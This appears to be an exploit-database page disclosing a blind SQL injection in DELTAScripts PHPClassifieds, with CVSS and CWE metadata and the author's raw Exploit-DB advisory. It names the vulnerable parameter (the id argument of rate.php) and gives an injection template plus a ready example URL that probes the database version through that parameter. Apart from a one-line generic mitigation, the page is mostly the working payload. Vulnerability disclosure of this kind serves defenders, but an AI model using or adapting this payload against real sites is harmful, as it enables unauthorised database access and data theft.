header-logo
Suggest Exploit
vendor:
DELTAScripts PHPClassifieds
by:
Hamza 'MizoZ' N.
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: DELTAScripts PHPClassifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

DELTAScripts PHPClassifieds

Vulnerability is in the rate.php, $_GET['id']. An example of the exploit is http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

/*

Name : DELTAScripts PHPClassifieds
Vuln : Blind SQL Injection

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com
WebSite : www.greymen.org<http://www.greymen.org>

Greetz : Zuka, all friends & arab hackers

*/

Vulnerability is in the rate.php , $_GET['id']

[HOST]/[PATH]/rate.php?id=[true value]+[INJECTION]

exemples :
http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--

Navigation

Suggest Exploit

Services By CQR